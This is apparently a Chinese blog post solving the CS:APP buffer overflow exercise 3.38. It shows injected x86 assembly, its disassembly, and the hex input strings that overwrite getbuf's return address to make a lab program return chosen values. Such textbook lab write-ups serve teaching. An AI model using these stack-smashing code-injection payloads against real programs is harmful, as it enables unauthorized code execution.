# 《深入理解计算机系统》3.38题解——缓冲区溢出攻击实例（续3）

《深入理解计算机系统》3.38题解——缓冲区溢出攻击实例（续3）

1. 问题描述

2. 目标分析与题解

3. 验证

4. 小结

4.1 若希望输出为0x12345678呢？

 ;file name: bomb.s mov    \$0x12345678, %eax push   \$0x401158 ret \$ objdump -d bomb.o show.o:     file format pe-i386 Disassembly of section .text: 00000000 <.text>:    0:   b8 78 56 34 12          mov    \$0x12345678,%eax    5:   68 58 11 40 00          push   \$0x401158    a:   c3                      ret    b:   90                      nop    c:   90                      nop    d:   90                      nop    e:   90                      nop    f:   90                      nop

 \$ ./bomb.exe Type Hex string:b8 78 56 34 12 68 58 11 40 00 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 bf 22 00 80 bf 22 00 getbuf returned 0x12345678

4.2 若希望输出为0xabc呢？

 ;file name: bomb.s mov    \$0xabc, %eax push   \$0x401158 ret \$ objdump -d bomb.o show.o:     file format pe-i386 Disassembly of section .text: 00000000 <.text>:    0:   b8 bc 0a 00 00          mov    \$0xabc,%eax    5:   68 58 11 40 00          push   \$0x401158    a:   c3                      ret    b:   90                      nop    c:   90                      nop    d:   90                      nop    e:   90                      nop    f:   90                      nop

 \$ ./bomb.exe Type Hex string:b8 bc 0a 00 00 68 58 11 40 00 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 bf 22 00 80 bf 22 00 getbuf returned 0xabc

4.3 一些例子

 Input:b8 ef be ad de 68 58 11 40 00 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 bf 22 00 80 bf 22 00   Output:xdeadbeef Input:b8 78 56 34 12 68 58 11 40 00 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 bf 22 00 80 bf 22 00   Output:0x12345678 Input:b8 56 34 12 00 68 58 11 40 00 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 bf 22 00 80 bf 22 00   Output:0x123456 Input:b8 bc 0a 00 00 68 58 11 40 00 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 bf 22 00 80 bf 22 00   Output:0xabc

Reference

http://blog.csdn.net/lijingze2003/archive/2005/02/25/302275.aspx